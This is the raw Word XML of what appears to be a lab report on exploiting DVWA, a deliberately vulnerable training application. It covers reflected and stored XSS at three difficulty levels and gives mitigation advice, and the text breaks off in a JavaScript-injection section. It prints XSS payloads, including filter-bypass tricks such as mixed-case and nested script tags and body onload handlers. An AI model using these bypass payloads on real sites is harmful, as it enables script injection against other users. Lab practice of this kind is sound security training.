      <w:r w:rsidRPr="00D91A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flected XSS (Cross-Site Scripting)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A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ulnerability in DVWA, I discovered that the application </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A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flects user input back into the HTML response</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A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out proper sanitization. This allows an attacker like me to inject and execute arbitrary JavaScript in the victim’s browser through a specially crafted link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F6A7AF" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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1A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flected XSS is typically exploited by </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A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icking a user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A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to clicking a malicious link, often via email or a social engineering message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB9731" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91A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D5F60" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc198745949"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="2862BF93" w14:textId="2CB42421" w:rsidR="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('XSSReflected')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07230CB4" w14:textId="531D1683" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C156595" wp14:editId="043FC23F">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10147654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DD3D" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc198745950"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="37AA4F8F" w14:textId="23AAA0DB" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload= &lt;scriPt&gt;alert('XSSReflected')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D8BA8A" w14:textId="68344326" w:rsidR="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">"Capitalize one letter to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the filter."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156A3C13" w14:textId="4CED82D9" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47909A8E" wp14:editId="0FBDED28">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6953210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2E46" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc198745951"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="3A88D3BF" w14:textId="15CE7B9A" w:rsidR="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload= &lt;body onload=alert('XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C2780" w14:textId="26D15610" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E7BD976" wp14:editId="5B240418">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6810509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075B" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc198745952"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="3532DE7E" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91A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 1. Encode Output Properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E58EB" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>context-aware escaping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HTML, JavaScript, URL). For HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF624B6" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1033E3" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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echo htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA367DA" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91A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 2. Use Security Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD3EE9C" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC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Use frameworks that automatically escape output (e.g., Django, React, Laravel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0675BD67" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC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Use libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP Java Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEFCD04" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91A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 3. Validate &amp; Sanitize Input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2398FFED" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC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Reject input with &lt;, &gt;, " unless explicitly needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9EE91C" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91AFC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Use regex filters for expected formats (e.g., names, emails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61B1FC" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91A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 4. Enable CSP (Content Security Policy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F5F015" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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Block inline scripts using a strict policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A081FCF" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58F6F2" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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Content-Security-Policy: script-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C066E90" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91A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 5. Don’t Reflect User Input Directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCC838C" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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Avoid reflecting untrusted data into HTML, especially in scripts or inline attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F56A91C" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91A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7DD10" w14:textId="465A2C0A" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B"/>
    <w:p w14:paraId="0C5864FC" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E18CC" w14:textId="5A1697F4" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc198745953"/>
      <w:r>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="104A6512" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc198745954"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="79858A22" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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B2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ile testing the </w:t>
      </w:r>
      <w:r w:rsidRPr="009B25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ored Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2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ulnerability in DVWA, I successfully injected a persistent JavaScript payload that gets stored in the application database and is executed every time a user visits the affected page. Unlike </w:t>
      </w:r>
      <w:r w:rsidRPr="009B25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flected XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2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stored XSS does not require a crafted link — it auto-executes when the victim opens the vulnerable page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13113576" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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B2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type of attack is highly dangerous because it impacts all users who access the page, especially admins or users with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED46502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40FAD" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc198745955"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="4CC676E5" w14:textId="0A7B3598" w:rsidR="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload= &lt;script&gt;alert("STOREDXSS")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E1EEE3" w14:textId="3F6C572D" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="710FD509" wp14:editId="53C62FF8">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="27930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12CC" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc198745956"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="1AB09EBE" w14:textId="386F429C" w:rsidR="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload= &lt;scr&lt;script&gt;ipt&gt;alert('STOREDXSS')&lt;/scr&lt;script&gt;ipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08340030" w14:textId="0F630D4C" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4977A3D6" wp14:editId="7D76DB40">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1412537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09BB" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc198745957"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="0F6BDF59" w14:textId="0A845EA5" w:rsidR="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload= &lt;body onload=alert('STOREDHIGHXSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AA9364" w14:textId="00EA9790" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="303D9E64" wp14:editId="397FF8C1">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="115820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1ACF" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc198745958"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="57AA7F81" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 1. Sanitize and Encode Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA69C1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Always encode user input before displaying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7EE8D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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA20535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echo htmlspecialchars($message, ENT_QUOTES, 'UTF-8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE7C19" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 2. Use Secure Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBAD9C" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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 xml:space="preserve">Frameworks like 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Pr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 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>Angular</w:t>
      </w:r>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 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>Django</w:t>
      </w:r>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> escape user input by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA03467" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 3. Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7307417C" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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Only allow expected content (e.g., plain text).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78682BBA" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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Use input filters to remove tags or script keywords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F627E2C" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 4. Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F44B7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Restrict what scripts can run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634BD514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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC50D99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Content-Security-Policy: script-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A77A6D" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 5. Database Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08108B42" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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Escape all inputs before storing in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB066A" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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Prevent execution of scripts on retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E933B4A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EAAC8" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRPr="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B"/>
    <w:p w14:paraId="5E83EADD" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B809D40" w14:textId="4CBC7257" w:rsidR="00C3478B" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc198745959"/>
      <w:r>
        <w:t>Content Security Policy Bypass</w:t>
      </w:r>
      <w:r w:rsidR="007043FE">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="5A93011F" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc198745960"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="549EE252" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc198745961"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="6E5D3861" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc198745962"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="0948E437" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc198745963"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="4C67D8F0" w14:textId="77777777" w:rsidR="00005892" w:rsidRPr="00C3478B" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc198745964"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="59097324" w14:textId="77777777" w:rsidR="00005892" w:rsidRPr="00005892" w:rsidRDefault="00005892" w:rsidP="00005892"/>
    <w:p w14:paraId="4AE56DBF" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A1108" w14:textId="2C1F6123" w:rsidR="00C3478B" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc198745965"/>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="007043FE">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="084B371D" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc198745966"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="73D6F444" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25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B2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is test scenario, I targeted an input field vulnerable to </w:t>
      </w:r>
      <w:r w:rsidRPr="009B25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JavaScript Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2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— a form of </w:t>
      </w:r>
      <w:r w:rsidRPr="009B25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oss-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2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ere malicious JavaScript code is injected directly into the application's client-side logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1865D608" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25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B2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vulnerability allows an attacker to manipulate the web page’s behavior or steal sensitive data by executing unauthorized JavaScript in the context of the victim’s browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50CD1C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E0536" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc198745967"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="167C4C18" w14:textId="3C5838D8" w:rsidR="009B25FB" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Capture_Req_ChangeMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3360D81D" w14:textId="47CBEC23" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03555F47" wp14:editId="39E1E225">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4828049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C17A" w14:textId="7ACF9622" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
